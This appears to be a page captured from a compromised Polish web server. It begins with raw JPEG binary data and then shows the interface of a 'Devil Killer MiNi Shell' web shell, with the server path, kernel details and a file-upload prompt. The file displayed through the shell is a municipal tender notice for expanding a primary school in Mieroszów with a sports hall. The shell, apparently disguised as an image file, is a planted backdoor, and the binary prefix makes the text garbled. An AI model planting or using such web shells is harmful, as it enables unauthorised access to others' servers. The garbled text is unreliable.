JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230310/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230310/0012999701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Rozbudowa Publicznej Szkoły Podstawowej w Mieroszowie z budową sali sportowej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Mieroszów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 890718260</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Niepodległości</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mieroszów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-350</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL517 - Wałbrzyski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">74 303 01 88</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@mieroszow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.mieroszow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozbudowa Publicznej Szkoły Podstawowej w Mieroszowie z budową sali sportowej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f70a722f-bf27-11ed-8261-62cbbe4d0ca4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00129997</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-03-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00036933/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.6 Rozbudowa Publicznej Szkoły Podstawowej w Mieroszowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/mieroszow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/mieroszow</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">zgodnie z SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">zgodnie z SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">zgodnie z SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BR.271.07.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Rozbudowa Publicznej Szkoły Podstawowej w Mieroszowie z budową sali sportowej -<br/>Zadanie będzie realizowane na działce nr 119/1, 112 obr. Mieroszów 2.<br/>2. Rozbudowa szkoły podstawowej i budowa hali sportowo-rekreacyjnej projektowana jest<br/>w formie jedno- i dwu-kondygnacyjnego budynku, niepodpiwniczonego. Podstawową częścią<br/>budynku jest boisko sportowe z widownią. Zapleczem sali sportowej jest zespół dwóch szatni z<br/>łazienkami, pokojem dla nauczycieli lekcji wychowania fizycznego i magazynem sprzętu<br/>sportowego. Ponadto na parterze budynku zaprojektowano sanitariaty ogólnodostępne, sanitariaty<br/>dla uczniów oraz dwie sale lekcyjne i gabinet dyrektora. Dodatkowo na parterze zostało<br/>przewidziane pomieszczenie siłowni wraz z przyległym magazynem na sprzęt sportowy. Całość<br/>spina układ komunikacji wewnętrznej z bezpośrednim dostępem na halę sportową.<br/>Na piętrze budynku znajduje się siedem sal lekcyjnych wraz z sanitariatami dla uczniów oraz<br/>pokój nauczycielski wraz z zapleczem socjalnym i toaletą. Ponadto na piętrze przewidziano dwa<br/>pomieszczenia serwerowni i wentylatorowni.<br/>Parter i piętro są połączone klatką schodową w obrębie której znajduje się również podnośnik<br/>windowy dla osób niepełnosprawnych.<br/>Budynek w technologii tradycyjnej. Ściany murowane z bloczków silikatowych, stropy żelbetowe<br/>prefabrykowane, pokrycie dachów papą termozgrzewalną.<br/>Budynek ogrzewany pompą ciepła. Cały obiekt objęty wentylacją mechaniczną nawiewnowywiewną<br/>z rekuperacją.<br/>3. Inwestycja została podzielona na IV Etapy:<br/>3.1 Etap I – stan zerowy (ławy i stopy fundamentowe, podłoga parteru bez posadzek, przyłącza)<br/>3.2 Etap II – stan surowy zamknięty<br/>3.3 Etap III – prace wykończeniowe wraz z zakończeniem robót budowlanych<br/>3.4 Etap IV – formalności po zakończeniu budowy<br/>4. Zakres robót<br/>4.1 Roboty konstrukcyjno-budowlane<br/>* Prace przygotowawcze i rozbiórki<br/>* Roboty ziemne<br/>* Fundamenty<br/>* Izolacje fundamentów<br/>* Konstrukcja główna<br/>* Stropodach wraz z pokryciem<br/>* Elewacja<br/>* Podłoża i posadzki<br/>* Ściany i ścianki działowe<br/>* Tynki, roboty malarskie, okładziny ścian<br/>* Stolarka zewnętrzna i wewnętrzna<br/>* Elementy ślusarskie<br/>* Wyposażenie:<br/>- zakup, montaż i dostawa trybuny,<br/>- zakup, montaż i dostawa windy,<br/>UWAGA! Opisane w dokumentacji projektowej wyposażenie sportowe<br/>(z pominięciem trybuny) wraz wyposażeniem meblowym zostało wyłączone<br/>z niniejszego postępowania.<br/>4.2 Roboty sanitarne:<br/>* Technologia pompy ciepła<br/>* Instalacja centralnego ogrzewania<br/>* Instalacja ciepła technologicznego<br/>* Instalacja hydrantowa<br/>* Przyłącze wodociągowe<br/>* Kanalizacja deszczowa grawitacyjna<br/>* Kanalizacja sanitarna zewnętrzna<br/>* Instalacja kanalizacji sanitarnej<br/>* Biały montaż<br/>* Instalacja wodociągowa<br/>* Instalacja chłodnicza central wentylacyjnych<br/>* Instalacja wentylacji<br/>4.3 Roboty elektryczne:<br/>* Usunięcie kolizji sieci elektroenergetycznej z projektowaną inwestycją dokumentacja<br/>załączona do postępowania, w trakcie uzyskiwania decyzji pozwolenia na budowę<br/>* Linia zasilająca<br/>* Rozdzielnie<br/>* Okablowanie<br/>* Osprzęt<br/>* Oświetlenie<br/>* Instalacje niskoprądowe<br/>* Instalacja oddymiania<br/>* Instalacja PV<br/>* Instalacja uziemiająca<br/>* Pomiary<br/>4.4 Projektowane zagospodarowania terenu<br/>a) miejsce gromadzenia odpadów stałych,<br/>b) układ komunikacyjny na działce: komunikacja pieszo-jezdna nawierzchnią utwardzoną od<br/>obu bram wjazdowych oraz projektowane utwardzenia między budynkiem szkoły hali<br/>sportowej oraz wzdłuż budynku szkoły od strony północnej,<br/>c) miejsce postojowe dla osób niepełnosprawnych<br/>d) schody zewnętrzne i podjazd dla osób niepełnosprawnych,<br/>e) obsługa komunikacyjna za pośrednictwem projektowanego zjazdu z drogi gminnej o nr<br/>ewid. 112,<br/>f) odprowadzenie wody deszczowej – rozbudowa wewnętrznej instalacji kanalizacji<br/>deszczowej, system odprowadzania wody deszczowej istniejącym przyłączem do sieci<br/>ogólnospławnej,<br/>g) odprowadzenie ścieków – rozbudowa wewnętrznej instalacji kanalizacji sanitarnej, system<br/>odprowadzania ścieków istniejącym przyłączem do sieci ogólnospławnej,<br/>h) uzbrojenie terenu:<br/>* sieci elektroenergetyczne – istniejąca do przebudowy – zwiększenie mocy<br/>przyłączeniowej oraz zmiana trasy linii napowietrznej i doziemnej wg odrębnego<br/>opracowania<br/>* sieci kanalizacyjne – rozbudowa<br/>* sieci gazowe – istniejące<br/>* sieci wodociągowe – rozbudowa<br/>* sieci kanalizacji deszczowej – rozbudowa<br/>i) istniejące ukształtowanie terenu w obszarze zagospodarowania jest zróżnicowane wokół<br/>budynku od - 50 cm do -117 cm względem posadzki parteru. Przewiduje się wyrównanie<br/>terenu wokół budynku dostosowując wysokość do posadowienia parteru części<br/>rozbudowywanej<br/>j) zieleń – projektuje się wycinkę sześciu drzew iglastych i dwóch drzew liściastych<br/>5. UWAGA! ZE WZGLĘDU NA WZROST ZAPOTRZEBOWANIA NA ENERGIĘ<br/>ELEKTRYCZNĄ, KONIECZNE JEST WYKONANIE NOWEGO PRZYŁĄCZA<br/>ENERGETYCZNEGO. WYKONANIE PO STRONIE TAURON. WARUNKI<br/>TECHNICZNE W CZĘŚCI 8 OPZ - „DOKUMENTY”<br/>6. UWAGA! Opisane w dokumentacji projektowej wyposażenie sportowe<br/>(z pominięciem trybuny) wraz wyposażeniem meblowym zostało wyłączone<br/>z niniejszego postępowania.<br/>7. UWAGA! W ramach realizacji przedmiotu zamówienia Wykonawca zobowiązany jest do<br/>zabezpieczenie miejsca prowadzenia robót (odgrodzenie/oznakowanie), zachowania<br/>wszelkich warunków, norm bezpieczeństwa i higieny pracy z uwagi na fakt, że prace będą<br/>prowadzone podczas odbywających się zajęć szkolnych w budynku szkoły.<br/>8. Szczegółowy opis przedmiotu zamówienia określa OPZ stanowiący załącznik nr 10 do SWZ<br/>oraz projekt umowy stanowiący załącznik nr 9 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">45262311-4 - Betonowanie konstrukcji</p> <p class="mb-0">45262310-7 - Zbrojenie</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45443000-4 - Roboty elewacyjne</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45331200-8 - Instalowanie urządzeń wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na<br/>zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego<br/>warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile<br/>wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie<br/>3) sytuacji ekonomicznej lub finansowej:<br/>a) Wykonawca spełni warunek jeśli wykaże, że jest ubezpieczony od odpowiedzialności<br/>cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia z sumą<br/>gwarancyjną o wartości nie mniejszej niż 10 000 000,00 zł<br/>b) Zamawiający wymaga posiadania przez wykonawcę zdolności kredytowej lub środków<br/>finansowych w wysokości min 5 000 000,00 zł<br/>4) zdolności technicznej lub zawodowej:<br/>a) Wykonawca spełni warunek jeśli wykaże, że w okresie ostatnich 5 lat przed upływem<br/>terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy – w tym okresie,<br/>wykonał należycie, co najmniej jedną robotę budowlaną obiektu z konstrukcją o rozpiętości<br/>co najmniej 12 m, polegającą na budowie/przebudowie/rozbudowie i wartość tej roboty<br/>wynosiła co najmniej 8 000 000,00 zł brutto oraz w zakres wykazanej roboty wchodziły<br/>następujące branże: konstrukcyjno-budowlana, instalacyjna-sanitarna, instalacyjnaelektryczna/<br/>elektroenergetyczna;<br/>Warunek udziału w postępowaniu musi być spełniony:<br/>- przez Wykonawcę samodzielnie, lub<br/>- w przypadku Wykonawców występujących wspólnie, samodzielnie przez jednego<br/>z Wykonawców występujących wspólnie, lub<br/>- przez podmiot udostępniający samodzielnie<br/>b) Wykonawca spełni warunek, jeżeli wykaże, iż dysponuje lub ma możliwość dysponowania<br/>odpowiednim personelem który będzie pełnić następujące funkcje:<br/>- Kierownik budowy/kierownik robót posiadający:<br/>*uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjnobudowlanej<br/>bez ograniczeń;<br/>* co najmniej 5-letnie doświadczenie zawodowe, w tym doświadczenie na stanowisku<br/>kierownika budowy i/lub kierownika robót nad co najmniej dwiema robotami<br/>budowlanymi o wartości minimum 8 000 000,00 zł brutto przynajmniej jedna z nich<br/>i polegającą na budowie/przebudowie/rozbudowie obiektu z konstrukcją o rozpiętości co<br/>najmniej 12 m przynajmniej jedna z nich.<br/>- Kierownik robót sanitarnych posiadający:<br/>*uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń<br/>w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych,<br/>wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych;<br/>*co najmniej 5-letnie doświadczenie zawodowe, w tym doświadczenie na stanowisku<br/>kierownika robót sanitarnych nad co najmniej dwiema robotami budowlanymi o wartości<br/>minimum 8 000 000,00 zł brutto przynajmniej jedna z nich;<br/>- Kierownik robót elektrycznych i ektroenergetycznych posiadający:<br/>*uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń<br/>w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych<br/>i elektroenergetycznych bez ograniczeń;<br/>*co najmniej 5-letnie doświadczenie zawodowe, w tym doświadczenie na stanowisku<br/>kierownika robót elektrycznych i elektroenergetycznych nad co najmniej dwiema<br/>robotami budowlanymi o wartości minimum 8 000 000,00 zł brutto przynajmniej jedna<br/>z nich;<br/>Zamawiający dopuszcza łączenie ww. funkcji przez jedną osobę, jeśli wykazana osoba<br/>posiada wymagane uprawnienia i doświadczenie.<br/>Wymogi w zakresie posiadanych uprawnień budowlanych muszą być zgodne z przepisami<br/>ustawy z dnia 7 lipca 1994 r. - Prawo budowlane oraz zgodne z rozporządzeniem Ministra<br/>Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji<br/>technicznych w budownictwie z dnia 29 kwietnia 2019 r. w sprawie przygotowania<br/>zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie<br/>(Dz.U.2019 r. poz. 831) uprawniające do realizacji zadań objętych przedmiotem zamówienia<br/>lub im odpowiadające uprawnienia budowlane, które zostały wydane na podstawie wcześniej<br/>obowiązujących przepisów, uprawniające do realizacji zadań objętych przedmiotem<br/>zamówienia. W przypadku wykonawców zagranicznych, dopuszcza się równoważne<br/>kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art. 12a ustawy<br/>z dnia 7 lipca 1994 r. – Prawo budowlane, z uwzględnieniem postanowień ustawy z dnia 22<br/>grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach<br/>członkowskich Unii Europejskiej (t.j. Dz.U. 2020 r. poz. 220).<br/>Zamawiający wymaga, aby osoby o których mowa w pkt. VIII.2.4) posiadały biegłą<br/>znajomość języka polskiego, w innym przypadku Wykonawca zobowiązany jest zapewnić,<br/>na własny koszt, tłumacza dla potrzeb i na okres realizacji zamówienia.<br/>Warunek udziału w postępowaniu musi być spełniony:<br/>- przez Wykonawcę samodzielnie, lub<br/>- w przypadku Wykonawców występujących wspólnie, łącznie przez Wykonawców<br/>występujących wspólnie, lub<br/>- przez podmiot udostępniający samodzielnie lub łącznie przez Wykonawcę i podmiot<br/>udostępniający zasoby.<br/>3. Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada<br/>wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów,<br/>w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne<br/>przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia.<br/>4. Ocena spełnienia ww. warunków przez Wykonawców, będzie dokonywana wg zasady: spełnia/nie<br/>spełnia, na podstawie przedłożonych przez Wykonawców oświadczeń i dokumentów. Z treści<br/>dokumentów musi jednoznacznie wynikać, iż Wykonawca spełnił ww. warunki. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Dokumenty składane przez Wykonawcę na żądanie Zamawiającego potwierdzające brak podstaw<br/>do wykluczenia obejmują:<br/>1) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do<br/>tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji<br/>i konsumentów (Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę,<br/>ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia<br/>o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku<br/>o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do<br/>tej samej grupy kapitałowej - załącznik nr 4 do SWZ;<br/>2) informację z Krajowego Rejestru Karnego w zakresie art. 108 ust. 1 pkt 1 i 2 pzp; art. 108 ust.<br/>1 pkt 4 pzp- sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem;<br/>3) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji<br/>o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie<br/>wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu 